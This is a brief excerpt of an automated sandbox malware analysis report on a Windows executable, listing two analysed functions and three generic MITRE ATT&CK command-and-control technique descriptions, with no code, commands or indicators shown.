Windows Analysis Report
YDg44STseR.exe

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Function 061C97D8 Relevance: 1.9, APIs: 1, Instructions: 359
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre